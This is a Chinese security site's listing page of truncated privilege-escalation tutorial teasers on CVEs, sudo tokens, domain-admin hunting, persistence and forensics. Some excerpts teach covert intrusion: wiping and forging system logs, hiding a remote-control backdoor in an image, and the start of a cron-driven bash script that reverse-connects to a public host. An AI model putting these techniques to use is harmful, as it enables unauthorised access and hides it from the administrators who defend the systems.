分享两个利用sudo token实现提权的技巧 提权教程

分享两个利用sudo token实现提权的技巧

技术介绍 我们在进行技术研究的过程中,发现有些时候sudo并不会要求我们输入密码,因为它“记得”我们。那么它为什么会“记得”我们呢?它怎么识别我们的身份呢?我们能伪造自己的身份并拿到root权限吗? 实际上,sudo会在/var/run/sudo/ts/[username]目录中为每一位Linux用户创建一个单独的文件,这种文件中包含了身份认证成功与失败的相关信息。接下来,sudo会使用这些文件来记录所有的身份认证过程。 如何利用系统中的漏洞? $sudo whatever [sudo]password for user:    # ...
最新
阅读全文
漏洞分析:解析Windows XP版永恒之蓝中的一个Bug 提权教程

漏洞分析:解析Windows XP版永恒之蓝中的一个Bug

背景 黑掉Windows 7已经没什么挑战了,我这一次打算重新回顾一下那个针对Windows XP永恒之蓝漏洞的漏洞利用代码,之前这份Exploit就没成功过,而且我尝试了各种版本的补丁和服务包,但这份漏洞利用代码要么无法工作,要么就让设备蓝屏。因此我打算继续研究一下,因为FuzzBunch有太多没有被挖掘出来的“潜力”了。 但是在一次针对其他Windows XP设备的渗透测试过程中,我本来对FuzzBunch没抱希望的,但可怕的是,它竟然能用… 所以我问自己,为什么它能用到外界的Windows XP设备上,却没办法在我的实验环境中使用呢?(长话短说:因为单核/多核/PA...
阅读全文
漏洞预警 | CVE-2018-14665 X.Org提权漏洞 提权教程

漏洞预警 | CVE-2018-14665 X.Org提权漏洞

CVE-2018-14665 X.Org存在严重的提权漏洞 X.Org X服务器中验证命令行参数时出现问题,将导致任意文件覆盖,攻击者可利用这个漏洞特性实现提权(攻击者用户安装且可使用X.Org)。   漏洞产生 漏洞产生于服务器对两个参数验证不正确,分别是“-modulepath与-logfile”。其中-modulepath参数可用来指定一个不安全的路径,并跨权限执行代码,-logfile参数则可用来在文件系统中实现任意文件覆盖。   漏洞修复 目前补丁已于25日发布,同时PoC也已经公布,用户应及时...
阅读全文
Windows Java Usage Tracker本地提权漏洞分析(CVE-2018-3211) 提权教程

Windows Java Usage Tracker本地提权漏洞分析(CVE-2018-3211)

前言 近期,我们发现了一个Java Usage Tracker中的设计缺陷,可导致攻击者创建任意文件,注入指定参数,并实现本地权限提升。反之,该漏洞可以用于权限提升,从而使攻击者可以访问受漏洞影响系统中的资源,这些资源通常受到保护,或仅限于特定应用程序或用户才有权访问。 我们通过Zero Day Initiative,与Oracle合作修复了这一漏洞,该漏洞已经在Oracle的2018年10月更新中实现修复。因此,需要敦促个人用户及企业尽快更新他们的Java版本。 在本文中,我们将深入研究这一漏洞在Windows上的出现原因、Java Usage Tracker的工作原理...
阅读全文
如何使用Windows Library文件进行持久化 提权教程

如何使用Windows Library文件进行持久化

前言 想象一下,假设在你不知道的情况下,攻击者在你的计算机上放置了一个恶意文件。每当你访问桌面上某个文件夹时(例如Documents文件夹),都会执行一次该文件。这样的场景,通过利用一种鲜为人知的持久化技术就可以实现,这一过程需要用到Windows库(Library)文件。 在Windows系统中,引入了库文件,允许用户在单个视图中查看多个目录的内容。库可以包含存储在本地计算机或远程位置的文件或文件夹。 对这些文件进行滥用以实现持久化的技术,首先由WikiLeaks Vault 7公开,这种技术与Junction Folder滥用有许多相似之处。由于这两种技术都难以检测,...
阅读全文
得到内网域管理员的5种常见方法 提权教程

得到内网域管理员的5种常见方法

1.Netbios and LLMNR Name Poisoning 这个方法在WIN工作组下渗透很有用,WIN的请求查询顺序是下面三个步骤:本地hosts文件(%windir%\System32\drivers\etc\hosts),DNS服务器,NetBIOS广播,如果前2个请求失败,则在本地发送NetBIOS广播请求,此时任何本地网络的系统都能回答这个请求,使用SpiderLabs出品的Responder工具,能够在不借助ARP欺骗的情况下,响应这个请求.其实metasploit也能利用(http://www.packetstan.com/2011/03/nbns-spoofing-o...
阅读全文
西部数据My Cloud存储设备被曝可提权认证绕过漏洞 提权教程

西部数据My Cloud存储设备被曝可提权认证绕过漏洞

近期,网络设备漏洞研究团队exploitee.rs公布,西部数据 My Cloud 网络存储设备存在一个认证绕过漏洞( CVE-2018-17153),未授权的远程或本地网络攻击者可以利用该漏洞,无需密码就能提权成为admin管理员身份,获取对 My Cloud设备的完全控制权。  漏洞介绍 该漏洞能可使得未授权用户能创建与其IP地址相关联的管理员会话,然后进一步利用,可以实现管理员特权命令执行,获取对My Cloud 存储设备的控制。该漏洞是研究者通过逆向CGI二进制文件时发现的。 当My Cloud设备管理员授权认证登录后,会产生一个与其IP地址关联的相应的...
阅读全文
Windows内核漏洞利用提权教程 提权教程

Windows内核漏洞利用提权教程

继上一篇“使用自动化脚本进行Windows提权”,本文将介绍有关Windows内核漏洞提权的方法。我将使用内置的Metasploit模块作为演示。通过本文的学习,你将了解系统的哪些部分可被利用,并匹配最佳可利用模块进一步的提升权限。 Windows-Exploit-suggester Metasploit内置模块提供了各种可用于提权的local exploits,并会基于架构,平台(即运行的操作系统),会话类型和所需默认选项提供建议。这极大的节省了我们的时间,省去了我们手动搜索local exploits的麻烦。虽说如此,但也并非所有列出的local exploits都可用。所以,无...
阅读全文
Linux提权思路+实战 提权教程

Linux提权思路+实战

前言 首先关于Linux提权我们得先明白几个概念。 linux发行版本 是我们常说的Linux操作系统,也即是由Linux内核与各种常用软件的集合产品,全球大约有数百款的Linux系统版本,每个系统版本都有自己的特性和目标人群, 例如: CentOS redhat ubuntu kali linux内核 Linux系统内核指的是一个由Linus Torvalds负责维护,提供硬件抽象层、硬盘及文件系统控制及多任务功能的系统核心程序。 ...
阅读全文
渗透技巧——Windows单条日志的删除 提权教程

渗透技巧——Windows单条日志的删除

0x00 前言 在之前的文章《渗透技巧——Windows日志的删除与绕过》介绍了常见的Windows日志清除与绕过方法,但未提到单条日志的清除。 这一次将要结合刚刚完成的Windows XML Event Log (EVTX)单条日志清除系列文章,介绍在渗透测试中Windows XML Event Log (EVTX)单条日志清除的具体使用方法,同时结合利用思路给出防御建议 Windows XML Event Log (EVTX)单条日志清除系列文章地址: Windows XML Event Log (EVTX)单...
阅读全文
Windows平台下实现提权的新姿势 提权教程

Windows平台下实现提权的新姿势

在这篇文章中,我们将给大家演示如何通过无引号服务路径来实现在Windows平台下的提权。在渗透测试的过程中,当我们以本地用户身份生成命令Shell时,我们是无法检查受限文件或目录的,因此我们才需要拿到管理员访问权。 无引号服务路径漏洞 这个漏洞跟可执行文件的路径有关,如果文件名中存在空格,或者文件路径没有包裹在双引号之中,那攻击者就可以用恶意exe文件替换掉原本合法的exe文件,并实现提权。 环境搭建 目标主机:Windows 7 攻击主机:Kali Linux 首先,我们需要在目标Windows系统中下载并安装一个名叫p...
阅读全文
超级详细的一次提权流程 提权教程

超级详细的一次提权流程

今天刚刚回到家 刚刚提到的服务器 于是乎就做一做文章给大家看看(没有什么技术含量 只是告诉大家一个思路) 系统的cmd是不能用了 自己找可写可执行权限的目录 (具体工具上传wt.asp 或者asp大马自带的目录权限检测工具) 这里我已经找到了可以执行cmd的目录 但是执行命令权限貌似很小  就连 ipconfig 都执行不了 之后就是查看一下 环境 看看是否有人提过 查看一下管理员 net localgroup administrator...
阅读全文
ADB配置提权漏洞(CVE-2017-13212)原理与利用分析 提权教程

ADB配置提权漏洞(CVE-2017-13212)原理与利用分析

0×01 背景 adb由于拥有shell权限,因此仅在授权PC端后才可使用shell权限,而通过该漏洞,可以实现在移动端获取shell权限,以致于可随意删除应用、屏幕截图等等高权限操作。不过移动端恶意应用程序必须能够连接到adbd正在监听的TCP端口,这就需要应用程序在它的AndroidMainifest.xml中定义INTERNET权限。 而漏洞作者所用的攻击方法是构造一个覆盖窗口,劫持用户点击,也就是经典的hijack攻击。Google也据此修复了此种攻击方式。 但是,我经过尝试后发现,除了以上构造hijack攻击窗口外,还可以劫持USB广播,然后在用户进行正常的连接...
阅读全文
Linux后门整理合集 提权教程

Linux后门整理合集

Unix Bash 远控后门 简介 利用 Unix/Linux 自带的 Bash 和 Crond 实现远控功能,保持反弹上线到公网机器。 利用方法 先创建 /etc/xxxx 脚本文件(名字自己改),利用该脚本进行反弹。以下脚本代表全自动反弹到 8.8.8.8 的 53 端口。 nano /etc/xxxx #!/bin/bash if netstat -ano|grep -v grep | grep "8.8.8.8">/dev/null then echo "OK">/dev/null else ...
阅读全文
渗透测试TIPS之删除、伪造Linux系统登录日志 提权教程

渗透测试TIPS之删除、伪造Linux系统登录日志

0×00. 引言 擦除日志在渗透测试中是非常重要的一个阶段,这样可以更好地隐藏入侵痕迹,做到不被系统管理人员察觉,实现长期潜伏的目的。 前段时间NSA泄露的渗透测试工具中就有一款wtmp日志的擦除,非常好用,这引起了我的兴趣,于是研究了一下linux 登录相关二进制日志的文件格式,用python写了一个日志擦除,伪造的工具(末尾附源码) 0×01. Linux中与登录有关的日志及其格式分析 Linux中涉及到登录的二进制日志文件有 /var/run/utmp /var/log/wtmp /var/log/btmp /var...
阅读全文
基于bro的计算机入侵取证实战分析 提权教程

基于bro的计算机入侵取证实战分析

什么是计算机入侵取证 计算机取证是运用计算机及其相关科学和技术的原理和方法获取与计算机相关的证据以证明某个客观事实的过程。它包括计算机证据的确定、收集、保护、分析、归档以及法庭出示。 bro基本介绍 bro是一款被动的开源流量分析器。它主要用于对链路上所有深层次的可疑行为流量进行安全监控,为网络流量分析提供了一个综合平台,特别侧重于语义安全监控。虽然经常与传统入侵检测/预防系统进行比较,但bro采用了完全不同的方法,为用户提供了一个灵活的框架,可以帮助定制,深入的监控远远超出传统系统的功能。 bro的目标在于搜寻攻击活动并提供其背景信息与使用模式。它能够将网络...
阅读全文
没有钱的安全部之系统日志安全 提权教程

没有钱的安全部之系统日志安全

Elastic Stack 5.0发布以来,基本上中小企业都可以使用开源的技术来做安全,特别是本人在一个没有钱的安全部。beats的加入让日志更加灵活,甚至可以通过beats优化部分安全运维的工作。本文尽可能还原真实部署过程中遇到的问题,也许有点杂乱,希望能对各位同学起到抛砖引玉的作用。 系统环境 ELK版本 Elasticsearch 版本5.0.1 Logstash 版本5.1.1(暂时未发现logstash 5.x版本elkb架构的影响) Kibana 版本5.0.1(版本尽量与elasti...
阅读全文
干货!!!图片后门 提权教程

干货!!!图片后门

今天分享一个干货教程,图片绑定后门,由于过程稍复杂,大家如果有不懂的地方请在下面留言,看到了会回复大家的。 首先我们需要几个工具。 2.远程工具 3.生成图标的网站http://www.ico.la/ 操作步骤 1.    找一张图片,这里我就随便找一张图片。打开网站,我们上传一张图片。选择想要的尺寸,保存图标。 保存下来的图标,我们先放着。接下来我们设置生成后门。 2.打开远控软件。 我们现在要生成一个后门的.exe文件。 由于远控软件都...
阅读全文
内网如何定位管理员 提权教程

内网如何定位管理员

内网渗透,不是简单的耍流氓的说"可内网渗透"或者“内网漫游”,有着更高更深的责任和需求,有着更多设备和报警及防护软件(如Bit9,惠普ARCsight,曼迪昂特等)的突破,有着更多网络拓扑和结构需要清晰洞察,有着更多的域控和域需要占领,当然了定位到内网管理员或者管理员上过的机器,应该会事半功倍。 本文原英文名称“I Hunt Sys Admins”,是Shmoocon ’15 Firetalks演讲的ppt。安全脉搏编辑翻译成《内网如何定位管理员》 现有的工具和谍报 系统内部自带的工具 psloggedon.exe已经被广泛使用好多年了。它通过检验...
阅读全文
禁止sethc.exe运行 防止3389的sethc后门 提权教程

禁止sethc.exe运行 防止3389的sethc后门

以Windows 2003为例,启动Windows 2003组策略 点“开始”,在“运行”中敲入gpedit.msc依次展开“用户配置”→“管理模板”→“系统”子键,此时可以看到一个“不要运行指定的Windows应用程序”选项,双击该选项,在“策略”选项卡中选择“启用”选项,启动Windows 2003禁止运行指定应用程序的功能,单击“不允许的应用程序的列表”中的“显示”按钮,打开列表框,在列表框中单击“添加”,打开“添加项目”窗口,然后在该窗口中输入需要禁止运行的程序名(可以不输入路径),比方说要禁用注册表编辑器,则输入 sethc.exe ,接着点...
阅读全文